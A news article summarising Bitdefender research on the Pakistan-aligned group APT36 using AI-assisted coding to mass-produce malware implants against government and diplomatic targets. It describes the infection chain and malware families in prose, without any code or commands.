Pakistan aligned threat actor Transparent Tribe has adopted artificial intelligence powered development tools to generate large volumes of malware implants aimed at government organizations and diplomatic missions, according to newly published research by Bitdefender.
Security researchers say the campaign reflects a shift toward mass production of malware rather than improved technical sophistication. Instead of focusing on highly advanced techniques, the group is creating large quantities of disposable binaries written in less commonly used programming languages such as Nim, Zig, and Crystal. These implants rely on widely trusted online platforms including Slack, Discord, Supabase, and Google Sheets to disguise command and control communication and avoid immediate detection within enterprise networks. Bitdefender researchers Radu Tudorica, Adrian Schipor, Victor Vrabie, Marius Baciu, and Martin Zugec described the activity as an attempt to flood target environments with what they called a high volume but mediocre set of implants produced with the assistance of large language models.
The researchers explained that this tactic reflects a broader transition toward what has been informally described as vibe coded malware or vibeware. Rather than relying on complex evasion techniques, attackers attempt to overwhelm monitoring systems with numerous variants of malicious programs written in multiple programming languages and using different communication protocols. Bitdefender refers to this strategy as Distributed Denial of Detection. The goal is to saturate security telemetry with many slightly different samples so that identifying and blocking each individual variant becomes more difficult. Large language models have lowered the barrier for threat actors by generating functional code even in unfamiliar programming languages. This enables attackers to quickly produce working malware or port core logic from one language to another without deep expertise in each environment.
Current activity attributed to the group also known as APT36 has primarily targeted government institutions and diplomatic missions located in several foreign countries. Investigators found that the attackers used LinkedIn to identify potential victims with access to valuable information. Although government organizations remain the main focus, the campaign has also targeted Afghan government entities and a smaller number of private sector companies. The infection chain typically begins with phishing emails that deliver malicious Windows shortcut files packaged inside ZIP archives or ISO disk images. In other cases, victims receive PDF documents containing a prominent Download Document button that redirects them to a compromised website which triggers the download of the same ZIP archive containing the shortcut file.
Once opened, the LNK file launches PowerShell commands directly in memory. These scripts download the primary backdoor and begin post compromise operations. Researchers observed the deployment of well known adversary simulation tools such as Cobalt Strike and Havoc, suggesting attackers are combining custom malware with established penetration testing frameworks to maintain persistence and flexibility. Among the tools identified in the campaign are Warcode, a Crystal based shellcode loader designed to load a Havoc agent directly into memory, and NimShellcodeLoader which deploys a Cobalt Strike beacon. Additional malware families include CreepDropper, a .NET based loader used to install payloads such as SHEETCREEP, a Go based information stealer that uses Microsoft Graph API for command and control, and MAILCREEP, a C# based backdoor that communicates through Google Sheets. Researchers also observed SupaServ, a Rust based backdoor using Supabase as its primary communication platform with Firebase as a fallback, along with LuminousStealer which extracts files through Firebase and Google Drive.
Other components uncovered during the investigation include CrystalShell, a cross platform backdoor written in Crystal that can operate on Windows, Linux, and macOS systems while using Discord channels for command and control communication, with one variant relying on Slack. ZigShell provides similar functionality but is written in Zig and focuses on file transfer capabilities. CrystalFile acts as a command interpreter that monitors a specific file directory and executes commands through the Windows command shell. Additional tools include LuminousCookies, which targets browser stored credentials and payment data from Chromium based browsers, BackupSpy which monitors local storage and removable media for sensitive data, ZigLoader which decrypts and executes shellcode in memory, and a modified version of the GateSentinel command and control framework.
Bitdefender researchers noted that despite the increased use of AI assisted development, many of the tools contain coding errors and unstable logic. However, the main risk lies in the industrialization of malware production that allows threat actors to rapidly scale their operations and distribute large numbers of variants. The combination of niche programming languages and the use of trusted cloud services for communication can allow even basic malware samples to remain active within targeted networks for longer periods by blending with legitimate traffic.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
